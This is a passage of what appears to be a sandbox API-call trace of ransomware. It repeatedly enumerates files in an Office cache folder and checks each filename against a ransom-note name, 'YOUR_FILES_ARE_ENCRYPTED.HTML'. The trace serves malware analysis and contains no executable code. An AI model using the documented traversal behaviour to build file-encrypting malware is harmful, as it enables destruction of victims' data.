(pszPath="B74632A4-B059-4F5A-849D-252172A06A99") returned="" [0111.386] lstrlenW (lpString="") returned 0 [0111.386] PathFindExtensionW (pszPath="B74632A4-B059-4F5A-849D-252172A06A99") returned="" [0111.386] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab9f482a, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xab9f482a, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xab9f482a, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x3888, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="BB41F806-1043-41B2-9372-8F6E7066247A", cAlternateFileName="BB41F8~1")) returned 1 [0111.386] StrStrIW (lpFirst="BB41F806-1043-41B2-9372-8F6E7066247A", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.386] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\BB41F806-1043-41B2-9372-8F6E7066247A") returned 157 [0111.386] PathFindExtensionW (pszPath="BB41F806-1043-41B2-9372-8F6E7066247A") returned="" [0111.386] lstrlenW (lpString="") returned 0 [0111.386] PathFindExtensionW (pszPath="BB41F806-1043-41B2-9372-8F6E7066247A") returned="" [0111.386] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab9bd819, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xab9bd819, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xab9bd819, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x242b, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="BB9FBC04-6400-4AC4-9268-D247CDF6AA89", cAlternateFileName="BB9FBC~1")) returned 1 [0111.386] StrStrIW (lpFirst="BB9FBC04-6400-4AC4-9268-D247CDF6AA89", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.386] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\BB9FBC04-6400-4AC4-9268-D247CDF6AA89") returned 157 [0111.386] PathFindExtensionW (pszPath="BB9FBC04-6400-4AC4-9268-D247CDF6AA89") returned="" [0111.386] lstrlenW (lpString="") returned 0 [0111.386] PathFindExtensionW (pszPath="BB9FBC04-6400-4AC4-9268-D247CDF6AA89") returned="" [0111.386] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab9c6201, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xab9c6201, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xab9c6201, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x2f7e, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="BFA7545B-6C23-48D5-BB01-97CC2290902F", cAlternateFileName="BFA754~1")) returned 1 [0111.386] StrStrIW (lpFirst="BFA7545B-6C23-48D5-BB01-97CC2290902F", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.386] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\BFA7545B-6C23-48D5-BB01-97CC2290902F") returned 157 [0111.386] PathFindExtensionW (pszPath="BFA7545B-6C23-48D5-BB01-97CC2290902F") returned="" [0111.386] lstrlenW (lpString="") returned 0 [0111.386] PathFindExtensionW (pszPath="BFA7545B-6C23-48D5-BB01-97CC2290902F") returned="" [0111.386] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xabae635e, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xabae635e, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xabae635e, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x7f46, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="BFB97937-ABF1-480A-946B-D367067F68C4", cAlternateFileName="BFB979~1")) returned 1 [0111.386] StrStrIW (lpFirst="BFB97937-ABF1-480A-946B-D367067F68C4", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.386] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\BFB97937-ABF1-480A-946B-D367067F68C4") returned 157 [0111.386] PathFindExtensionW (pszPath="BFB97937-ABF1-480A-946B-D367067F68C4") returned="" [0111.386] lstrlenW (lpString="") returned 0 [0111.387] PathFindExtensionW (pszPath="BFB97937-ABF1-480A-946B-D367067F68C4") returned="" [0111.387] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab9c1295, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xab9c1295, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xab9c1295, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x3c73, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="C0B5FEFE-C6C1-439E-B89D-E39A2031E527", cAlternateFileName="C0B5FE~1")) returned 1 [0111.387] StrStrIW (lpFirst="C0B5FEFE-C6C1-439E-B89D-E39A2031E527", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.387] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\C0B5FEFE-C6C1-439E-B89D-E39A2031E527") returned 157 [0111.387] PathFindExtensionW (pszPath="C0B5FEFE-C6C1-439E-B89D-E39A2031E527") returned="" [0111.387] lstrlenW (lpString="") returned 0 [0111.387] PathFindExtensionW (pszPath="C0B5FEFE-C6C1-439E-B89D-E39A2031E527") returned="" [0111.387] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb474db8b, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xb474db8b, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xb474ef1c, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x1ffd, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="C3DC5BD1-4AB1-4BDD-ACB0-FCCA65EE3D2A", cAlternateFileName="C3DC5B~1")) returned 1 [0111.387] StrStrIW (lpFirst="C3DC5BD1-4AB1-4BDD-ACB0-FCCA65EE3D2A", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.387] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\C3DC5BD1-4AB1-4BDD-ACB0-FCCA65EE3D2A") returned 157 [0111.387] PathFindExtensionW (pszPath="C3DC5BD1-4AB1-4BDD-ACB0-FCCA65EE3D2A") returned="" [0111.387] lstrlenW (lpString="") returned 0 [0111.387] PathFindExtensionW (pszPath="C3DC5BD1-4AB1-4BDD-ACB0-FCCA65EE3D2A") returned="" [0111.387] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab9cfd00, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xab9cfd00, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xab9d23da, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x2f7e, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="C4181E33-213A-4456-87BA-15FD83064187", cAlternateFileName="C4181E~1")) returned 1 [0111.387] StrStrIW (lpFirst="C4181E33-213A-4456-87BA-15FD83064187", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.387] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\C4181E33-213A-4456-87BA-15FD83064187") returned 157 [0111.387] PathFindExtensionW (pszPath="C4181E33-213A-4456-87BA-15FD83064187") returned="" [0111.387] lstrlenW (lpString="") returned 0 [0111.387] PathFindExtensionW (pszPath="C4181E33-213A-4456-87BA-15FD83064187") returned="" [0111.387] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb476c490, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xb476c490, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xb476d722, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x75b, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="C43ACAA0-C99F-49AB-9FCC-72AF340534D0", cAlternateFileName="C43ACA~1")) returned 1 [0111.387] StrStrIW (lpFirst="C43ACAA0-C99F-49AB-9FCC-72AF340534D0", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.387] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\C43ACAA0-C99F-49AB-9FCC-72AF340534D0") returned 157 [0111.387] PathFindExtensionW (pszPath="C43ACAA0-C99F-49AB-9FCC-72AF340534D0") returned="" [0111.387] lstrlenW (lpString="") returned 0 [0111.387] PathFindExtensionW (pszPath="C43ACAA0-C99F-49AB-9FCC-72AF340534D0") returned="" [0111.387] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4974447, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xb4974447, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xb49759af, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x2bd8, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="C52B4A7C-C9FD-485A-8375-F97F3A24C1BA", cAlternateFileName="C52B4A~1")) returned 1 [0111.387] StrStrIW (lpFirst="C52B4A7C-C9FD-485A-8375-F97F3A24C1BA", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.387] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\C52B4A7C-C9FD-485A-8375-F97F3A24C1BA") returned 157 [0111.387] PathFindExtensionW (pszPath="C52B4A7C-C9FD-485A-8375-F97F3A24C1BA") returned="" [0111.387] lstrlenW (lpString="") returned 0 [0111.387] PathFindExtensionW (pszPath="C52B4A7C-C9FD-485A-8375-F97F3A24C1BA") returned="" [0111.387] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc83e6a80, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xc83e6a80, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xc83e6a80, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x1167, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="C7B65EEC-91E0-4362-AC18-80B09C3C95AC", cAlternateFileName="C7B65E~1")) returned 1 [0111.387] StrStrIW (lpFirst="C7B65EEC-91E0-4362-AC18-80B09C3C95AC", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.387] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\C7B65EEC-91E0-4362-AC18-80B09C3C95AC") returned 157 [0111.387] PathFindExtensionW (pszPath="C7B65EEC-91E0-4362-AC18-80B09C3C95AC") returned="" [0111.387] lstrlenW (lpString="") returned 0 [0111.387] PathFindExtensionW (pszPath="C7B65EEC-91E0-4362-AC18-80B09C3C95AC") returned="" [0111.388] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4a8020a, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xb4a8020a, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xb4a8020a, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x8b27, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="C84B747D-39AC-4CEA-BFC3-4FF80CD49856", cAlternateFileName="C84B74~1")) returned 1 [0111.388] StrStrIW (lpFirst="C84B747D-39AC-4CEA-BFC3-4FF80CD49856", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.388] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\C84B747D-39AC-4CEA-BFC3-4FF80CD49856") returned 157 [0111.388] PathFindExtensionW (pszPath="C84B747D-39AC-4CEA-BFC3-4FF80CD49856") returned="" [0111.388] lstrlenW (lpString="") returned 0 [0111.388] PathFindExtensionW (pszPath="C84B747D-39AC-4CEA-BFC3-4FF80CD49856") returned="" [0111.388] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x829b15f8, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x829b15f8, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x829b5109, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x634f, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="C85A59C5-2B02-4194-AB2C-0E6E2B6031A0", cAlternateFileName="C85A59~1")) returned 1 [0111.388] StrStrIW (lpFirst="C85A59C5-2B02-4194-AB2C-0E6E2B6031A0", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.388] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\C85A59C5-2B02-4194-AB2C-0E6E2B6031A0") returned 157 [0111.388] PathFindExtensionW (pszPath="C85A59C5-2B02-4194-AB2C-0E6E2B6031A0") returned="" [0111.388] lstrlenW (lpString="") returned 0 [0111.388] PathFindExtensionW (pszPath="C85A59C5-2B02-4194-AB2C-0E6E2B6031A0") returned="" [0111.388] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4e2fa78, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xb4e2fa78, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xb4e30e51, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x5543, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="C9B26F48-B9B2-452D-9E4F-BD539A769B1B", cAlternateFileName="C9B26F~1")) returned 1 [0111.388] StrStrIW (lpFirst="C9B26F48-B9B2-452D-9E4F-BD539A769B1B", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.388] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\C9B26F48-B9B2-452D-9E4F-BD539A769B1B") returned 157 [0111.388] PathFindExtensionW (pszPath="C9B26F48-B9B2-452D-9E4F-BD539A769B1B") returned="" [0111.388] lstrlenW (lpString="") returned 0 [0111.388] PathFindExtensionW (pszPath="C9B26F48-B9B2-452D-9E4F-BD539A769B1B") returned="" [0111.388] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xabad3e63, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xabad3e63, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xabad3e63, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x1a54, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="CA094F8F-D41E-43AB-8A32-1A2F34851250", cAlternateFileName="CA094F~1")) returned 1 [0111.388] StrStrIW (lpFirst="CA094F8F-D41E-43AB-8A32-1A2F34851250", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.388] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\CA094F8F-D41E-43AB-8A32-1A2F34851250") returned 157 [0111.388] PathFindExtensionW (pszPath="CA094F8F-D41E-43AB-8A32-1A2F34851250") returned="" [0111.388] lstrlenW (lpString="") returned 0 [0111.388] PathFindExtensionW (pszPath="CA094F8F-D41E-43AB-8A32-1A2F34851250") returned="" [0111.388] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82387021, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x82387021, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x8238833c, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x2913, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="CADCE60F-4488-41B1-A9A8-CEB49F46BB73", cAlternateFileName="CADCE6~1")) returned 1 [0111.389] StrStrIW (lpFirst="CADCE60F-4488-41B1-A9A8-CEB49F46BB73", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.389] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\CADCE60F-4488-41B1-A9A8-CEB49F46BB73") returned 157 [0111.389] PathFindExtensionW (pszPath="CADCE60F-4488-41B1-A9A8-CEB49F46BB73") returned="" [0111.389] lstrlenW (lpString="") returned 0 [0111.389] PathFindExtensionW (pszPath="CADCE60F-4488-41B1-A9A8-CEB49F46BB73") returned="" [0111.389] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8293e9d0, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x8293e9d0, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x8293ff31, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x1e19, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="CCB1B3FC-5E0C-4241-ABC1-CA67B6C56947", cAlternateFileName="CCB1B3~1")) returned 1 [0111.389] StrStrIW (lpFirst="CCB1B3FC-5E0C-4241-ABC1-CA67B6C56947", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.389] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\CCB1B3FC-5E0C-4241-ABC1-CA67B6C56947") returned 157 [0111.389] PathFindExtensionW (pszPath="CCB1B3FC-5E0C-4241-ABC1-CA67B6C56947") returned="" [0111.389] lstrlenW (lpString="") returned 0 [0111.389] PathFindExtensionW (pszPath="CCB1B3FC-5E0C-4241-ABC1-CA67B6C56947") returned="" [0111.389] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4d94a38, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xb4d94a38, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xb4d94a38, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x422e, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="CFC05EA4-9A97-47D5-9459-FB2F94EE79CC", cAlternateFileName="CFC05E~1")) returned 1 [0111.389] StrStrIW (lpFirst="CFC05EA4-9A97-47D5-9459-FB2F94EE79CC", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.389] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\CFC05EA4-9A97-47D5-9459-FB2F94EE79CC") returned 157 [0111.389] PathFindExtensionW (pszPath="CFC05EA4-9A97-47D5-9459-FB2F94EE79CC") returned="" [0111.389] lstrlenW (lpString="") returned 0 [0111.389] PathFindExtensionW (pszPath="CFC05EA4-9A97-47D5-9459-FB2F94EE79CC") returned="" [0111.389] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4d8d5e0, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xb4d8d5e0, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xb4d8d5e0, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x666c, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="D004FD46-7AFD-4BC9-8FEF-59D3BAC650A2", cAlternateFileName="D004FD~1")) returned 1 [0111.389] StrStrIW (lpFirst="D004FD46-7AFD-4BC9-8FEF-59D3BAC650A2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.389] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\D004FD46-7AFD-4BC9-8FEF-59D3BAC650A2") returned 157 [0111.389] PathFindExtensionW (pszPath="D004FD46-7AFD-4BC9-8FEF-59D3BAC650A2") returned="" [0111.389] lstrlenW (lpString="") returned 0 [0111.389] PathFindExtensionW (pszPath="D004FD46-7AFD-4BC9-8FEF-59D3BAC650A2") returned="" [0111.390] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4d89a80, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xb4d89a80, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xb4d8ae10, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x595d, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="D03B54D7-2F02-4F26-B245-6759FD3E5356", cAlternateFileName="D03B54~1")) returned 1 [0111.390] StrStrIW (lpFirst="D03B54D7-2F02-4F26-B245-6759FD3E5356", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.390] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\D03B54D7-2F02-4F26-B245-6759FD3E5356") returned 157 [0111.390] PathFindExtensionW (pszPath="D03B54D7-2F02-4F26-B245-6759FD3E5356") returned="" [0111.390] lstrlenW (lpString="") returned 0 [0111.390] PathFindExtensionW (pszPath="D03B54D7-2F02-4F26-B245-6759FD3E5356") returned="" [0111.390] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab9d990d, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xab9d990d, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xab9ee668, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x4c5d, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="D1658A87-36B4-4565-B36F-CEF71FFC7033", cAlternateFileName="D1658A~1")) returned 1 [0111.390] StrStrIW (lpFirst="D1658A87-36B4-4565-B36F-CEF71FFC7033", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.390] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\D1658A87-36B4-4565-B36F-CEF71FFC7033") returned 157 [0111.390] PathFindExtensionW (pszPath="D1658A87-36B4-4565-B36F-CEF71FFC7033") returned="" [0111.390] lstrlenW (lpString="") returned 0 [0111.390] PathFindExtensionW (pszPath="D1658A87-36B4-4565-B36F-CEF71FFC7033") returned="" [0111.390] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, 